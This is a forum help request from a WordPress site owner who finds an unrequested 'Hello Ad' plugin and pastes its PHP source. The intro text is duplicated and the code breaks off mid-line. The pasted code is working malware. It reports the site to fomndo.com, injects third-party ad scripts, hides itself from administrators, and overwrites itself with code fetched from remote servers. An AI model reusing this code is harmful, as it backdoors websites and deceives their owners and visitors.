mariorick
Member
Hello friends. All right?
First of all, I don't know if I'm posting in the right place, but I thought it was the most appropriate here - correct me if I'm wrong.
Today my website gave a critical error, out of nowhere. I performed the debbug and it reported the following error
'Parse error: syntax error, unexpected end of file in plugins/helad.php on line 416'
I opened the file that shows that it is a plugin called "Hello Ad", which I did not install.
When looking the file, which was incomplete, they started with:
/ ** * Plugin Name: Hello ad
* Description: Monitor your traffic by adding ad codes.
* Author: Matthew Jensen
* Version: 1.0 * /
This plugin was automatically installed today at 4 pm on my website. And still created a folder inside / plugin with the name "kndroh-cibtdxge", at the same time.
The fact is that I did not install the 'Helo Ad' plugin and the only recent modification I did was to update plugins via the updates page within the wordpress panel and also to manually update the new version of the Quform plugin, downloaded here at Bebiato .
I deletes the file, which was in the root of the plugin folder, and apparently the site is back up and running.
What strikes me is that the plugin seems to show advertising on the page.
Did it come from some kind of malware from another nulled plugin?
I always download my nulleds through this forum and I never had any problems with that.
I'm attaching the file here in case anyone wants to take a look.
Since I am a layman in programming, I was unable to decipher much.
After that, my website started showing other debug errors, like for example
Notice: Trying to access array offset on value of type bool in /wp-content/plugins/premium-addons-pro/includes/white-label/admin.php on line 56'
Notice: Trying to access array offset on value of type null in /wp-content/plugins/elfsight-instagram-feed-cc/api/vendor/elfsight/Api.php on line 75
Notice: Undefined index: expires in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 576
Notice: Trying to access array offset on value of type null in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 585
Anyone can help me?
Here is the code of helad.php:
I appreciate the help in advance.
First of all, I don't know if I'm posting in the right place, but I thought it was the most appropriate here - correct me if I'm wrong.
Today my website gave a critical error, out of nowhere. I performed the debbug and it reported the following error
'Parse error: syntax error, unexpected end of file in plugins/helad.php on line 416'
I opened the file that shows that it is a plugin called "Hello Ad", which I did not install.
When looking the file, which was incomplete, they started with:
/ ** * Plugin Name: Hello ad
* Description: Monitor your traffic by adding ad codes.
* Author: Matthew Jensen
* Version: 1.0 * /
This plugin was automatically installed today at 4 pm on my website. And still created a folder inside / plugin with the name "kndroh-cibtdxge", at the same time.
The fact is that I did not install the 'Helo Ad' plugin and the only recent modification I did was to update plugins via the updates page within the wordpress panel and also to manually update the new version of the Quform plugin, downloaded here at Bebiato .
I deletes the file, which was in the root of the plugin folder, and apparently the site is back up and running.
What strikes me is that the plugin seems to show advertising on the page.
Did it come from some kind of malware from another nulled plugin?
I always download my nulleds through this forum and I never had any problems with that.
I'm attaching the file here in case anyone wants to take a look.
Since I am a layman in programming, I was unable to decipher much.
After that, my website started showing other debug errors, like for example
Notice: Trying to access array offset on value of type bool in /wp-content/plugins/premium-addons-pro/includes/white-label/admin.php on line 56'
Notice: Trying to access array offset on value of type null in /wp-content/plugins/elfsight-instagram-feed-cc/api/vendor/elfsight/Api.php on line 75
Notice: Undefined index: expires in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 576
Notice: Trying to access array offset on value of type null in /wp-content/plugins/custom-twitter-feeds-pro/inc/CtfAdmin.php on line 585
Anyone can help me?
Here is the code of helad.php:
Code:
<?php
/**
* Plugin Name: Hello ad
* Description: Monitize your traffic by adding ad codes.
* Author: Matthew Jensen
* Version: 1.0
*/
error_reporting(0);
ini_set('display_errors', 0);
$plugin_key='6e1aa39328ad32f62d99811e4d7fd962';
$version='1.2';
add_action('admin_menu', function() {
add_options_page( 'helload Plugin', 'helload', 'manage_options', 'helload', 'helload_page' );
remove_submenu_page( 'options-general.php', 'helload' );
});
add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_helload');
function salcode_add_plugin_page_settings_helload( $links ) {
$links[] = '<a href="' .
admin_url( 'options-general.php?page=helload' ) .
'">' . __('Settings') . '</a>';
return $links;
}
add_action( 'admin_init', function() {
register_setting( 'helload-settings', 'default_mont_options' );
register_setting( 'helload-settings', 'ad_code' );
register_setting( 'helload-settings', 'hide_admin' );
register_setting( 'helload-settings', 'hide_logged_in' );
register_setting( 'helload-settings', 'display_ad' );
register_setting( 'helload-settings', 'search_engines' );
register_setting( 'helload-settings', 'auto_update' );
register_setting( 'helload-settings', 'ip_admin');
register_setting( 'helload-settings', 'cookies_admin' );
register_setting( 'helload-settings', 'logged_admin' );
register_setting( 'helload-settings', 'log_install' );
});
$ad_code="
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src=\"https://asoulrox.com/pfe/current/tag.min.js?z=3336643\" data-cfasync=\"false\" async></script>
<script type=\"text/javascript\" src=\"//inpagepush.com/400/3336649\" data-cfasync=\"false\" async=\"async\"></script>
";
$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';
function helload_page() {
?>
<div class="wrap">
<form action="options.php" method="post">
<?php
settings_fields( 'helload-settings' );
do_settings_sections( 'helload-settings' );
$ad_code='';
$hide_admin='on';
$hide_logged_in='on';
$display_ad='organic';
$search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
$auto_update='on';
$ip_admin='on';
$cookies_admin='on';
$logged_admin='on';
$log_install='';
?>
<h2>Helload Plugin</h2>
<table>
<tr>
<th>Ad Code</th>
<td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td>
</tr>
<tr>
<th>Hide ads to :</th>
<td>
<input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
<label>
<input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
</label>
<label>
<input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
</label>
<br/>
</td>
</tr>
<tr>
<th>Recognize admin by :</th>
<td>
<label>
<input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
</label>
<label>
<input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
</label>
<label>
<input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
</label>
</td>
</tr>
<tr>
<th>Display ads to :</th>
<td>
<select name="display_ad">
<option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
<option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
</select>
</td>
</tr>
<tr>
<th>Search Engines</th>
<td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
comma separated </p>
</td>
</tr>
<tr>
<th>Auto Update :</th>
<td>
<label>
<input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
</label><br/>
</td>
</tr>
<tr>
<td><?php submit_button(); ?></td>
</tr>
</table>
</form>
</div>
<?php
}
/*************************log install***************************/
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.fomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_helload("http://www.fomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}
/*************************set default options***************************/
if(get_option('default_mont_options') !=='on')
{
update_option('ip_admin', $ip_admin);
update_option('ad_code', $ad_code);
update_option('cookies_admin', $cookies_admin);
update_option('logged_admin', $logged_admin);
update_option('hide_admin', $hide_admin);
update_option('hide_logged_in', $hide_logged_in);
update_option('display_ad', $display_ad);
update_option('search_engines', $search_engines);
update_option('auto_update', $auto_update);
update_option('log_install', '1');
}
/************************************************************************/
include_once(ABSPATH . 'wp-includes/pluggable.php');
if ( ! function_exists( 'display_ad_single' ) ) {
function display_ad_single($content){
if(is_single())
{
$content=$content.get_option('ad_code');;
}
return $content;
}
function display_ad_footer(){
if(!is_single())
{
echo get_option('ad_code');
}
}
//setting cookies if admin logged in
function setting_admin_cookie() {
setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(get_option('cookies_admin')=='on')
{
if(is_user_logged_in())
{
add_action( 'init', 'setting_admin_cookie',1 );
}
}
//log admin IP addresses
if(get_option('ip_admin')=='on')
{
if(current_user_can('edit_others_pages'))
{
if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
{
$ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);
}
}
}// end if log admins ip
//add cookies to organic traffic
if(get_option('display_ad')=='organic')
{
$search_engines = explode(',', get_option('search_engines'));
$referer = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($search_engines as $search) {
if (strpos($referer,$search)!==false) {
setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
$organic=true;
}
}
}//end
//display ad
if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())
{
$ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
if (stripos($ips, $_SERVER['REMOTE_ADDR']) === false)
{
/*****/
if(get_option('display_ad')=='organic')
{
if($organic==true || isset($_COOKIE['organic']))
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}
}
else
{
add_filter('the_content','display_ad_single');
add_action('wp_footer','display_ad_footer');
}
/****/
}
}
/*******************/
//update plugin
if(get_option('auto_update')=='on')
{
if( ini_get('allow_url_fopen') ) {
if (($new_version = @file_get_contents("http://www.fomndo.com/update.php") OR $new_version = @file_get_contents_helload("http://www.fomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents("http://www.fomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents("http://www.fomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
}
else
{
if (($new_version = @file_get_contents("http://www.fomndo.com/update.php") OR $new_version = @file_get_contents_helload("http://www.fomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents_helload("http://www.fomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
elseif ($new_version = @file_get_contents_helload("http://www.fomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) {
if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
@file_put_contents(__FILE__, $new_version);
}
}
}
}//end if auto update
/*********************************/
}// if function exist
function file_get_contents_helload($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function hide_plugin_helload() {
global $wp_list_table;
$hidearr = array('helad.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key,$hidearr)) {
unset($wp_list_table->items[$I appreciate the help in advance.
